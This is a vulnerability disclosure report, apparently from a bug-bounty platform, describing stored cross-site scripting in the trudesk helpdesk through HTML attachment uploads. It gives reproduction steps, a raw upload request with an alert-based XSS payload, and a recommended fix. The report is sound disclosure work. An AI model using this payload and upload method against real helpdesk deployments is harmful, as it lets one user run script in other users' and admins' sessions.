Least Privilege Violation in polonel/trudesk


Reported on

Jun 15th 2021


Stored xss via file upload


Stored xss allow to execute arbitary javascript in victim trudesk account External user also can execute xss in admin account here.


1. First from admin goto http://localhost:8118/teams and create a team called team2.
Now goto http://localhost:8118/accounts/agents and add new user called user B with support role and assign him to above team2.\

2. Now as a external user goto http://localhost:8118/newissue and create a new ticket .

3. Now user B goto his account and here he can see above public ticket .
Now user B can upload attachment to this ticket .
Here user B can attach any file including html and html file can execute javascript .
When uploading html file bellow request is sent to server

POST /tickets/uploadattachment HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34732645982285409509843513490
Content-Length: 409
Origin: http://localhost:8118
Connection: close
Referer: http://localhost:8118/tickets/1004
Cookie: PHPSESSID=n3ofevpn16pm9p45ngraltrbtk; SMFCookie600=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%220bf82305176bf11c423867c0f41a1f7944174f1e%22%3Bi%3A2%3Bi%3A1812778653%3Bi%3A3%3Bi%3A2%3B%7D; ElkArteCookie700=%5B1%2C%22b34b4193d3296f9b57616347174aaf58503bf2226225496e5a159745bea75aba%22%2C1812793345%2C2%5D; _csrf=X6SB4CbNToC6T0TuClv-MPqa; express.sid=s%3A5tJvaz7mQH_plOxJ0Qm39QiZ0gZ6hpQ2.J5ipJrnNm3tGCLsqbRWuvnbIJBLL9XC3vHMTg4DEHCo; $trudesk%3Atimezone=America/New_York; connect.sid=s%3APvO_kBBiQoJLhJ-OvfW6Zgv0zwLxrTD0.owzip3EbVPWPph8Ac2o7Al34KE5gNPk08e0eyd%2B%2Bze4; io=EzJ4Vn6dOVHG5S_8AAAJ; $trudesk%3Asidebar%3Aexpanded=false

Content-Disposition: form-data; name="ticketId"

Content-Disposition: form-data; name="attachment"; filename="exif.html"
Content-Type: text/html

xss"'><img src=x onerror=alert(document.domain)>

After uploading user can access uploaded file using url like http://localhost:8118/uploads/tickets/60c632a56e8507002262a20a/attachment_exif.html .
if any user open this file then xss is executed .


when serving uploaded file dont render it . You can use Content-Disposition: attachment; filename="filename.html" header to prevent rendering html file , it will ask user to download the file


Chris validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris marked this as fixed with commit 25c5ae 2 years ago
Chris has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation